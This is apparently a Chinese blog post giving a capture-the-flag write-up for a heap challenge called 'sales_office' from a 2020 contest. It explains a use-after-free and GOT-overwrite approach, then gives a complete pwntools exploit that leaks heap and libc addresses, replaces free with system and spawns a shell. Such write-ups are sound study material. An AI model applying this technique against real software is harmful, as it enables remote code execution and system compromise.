2020安恒4月赛pwn(看看还能不能更)

orz没赶上回家已经5点半了就回顾了一下pwn题
挺好的出的(远程可能为ubuntu18)我这用的是ubuntu16

思路

就是uaf控制好堆块然后写到got表leaklibc然后再次做一次写free为system即可
exp:

#!/usr/bin/python2
from pwn import *
def pwn():
	p=process('./sales_office')
	elf=ELF('./sales_office')
	libc=ELF('./libc.so.6')

	def add(size,data):
		p.sendlineafter(':','1')
		p.sendlineafter(':',str(size))
		p.sendafter(':',data)

	def show(idx):
		p.sendlineafter(':','3')
		p.sendlineafter(':',str(idx))

	def delete(idx):
		p.sendlineafter(':','4')
		p.sendlineafter(':',str(idx))

	add(0x50,'\x02'*2)#0
	add(0x50,'\x01'*1)#1
	add(0x50,'\x03'*3)#2
	delete(0)
	delete(1)
	delete(2)
	add(0x18,'\xb0')
	show(1)
	p.recvuntil(':\n')
	heap_base=u32(p.recv(4))-0x20
	log.success('heap_base: '+hex(heap_base))
	delete(1)
	add(0x50,p64(0x601ffa))
	add(0x50,'dd')
	add(0x50,'dd')
	add(0x50,'a'*0xe)
	show(7)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['free']
	system=libcbase+libc.sym['system']
	delete(1)
	delete(0)
	delete(6)
	add(0x50,p64(0x601ffa))
	add(0x50,'/bin/sh\x00')
	add(0x50,'/bin/sh\x00')
	add(0x50,'a'*0xe+p64(system))
	delete(0)
	log.success('libcbase: '+hex(libcbase))
	p.interactive()

if __name__=="__main__":
	pwn()

你可能感兴趣的:(2020安恒4月赛pwn(看看还能不能更))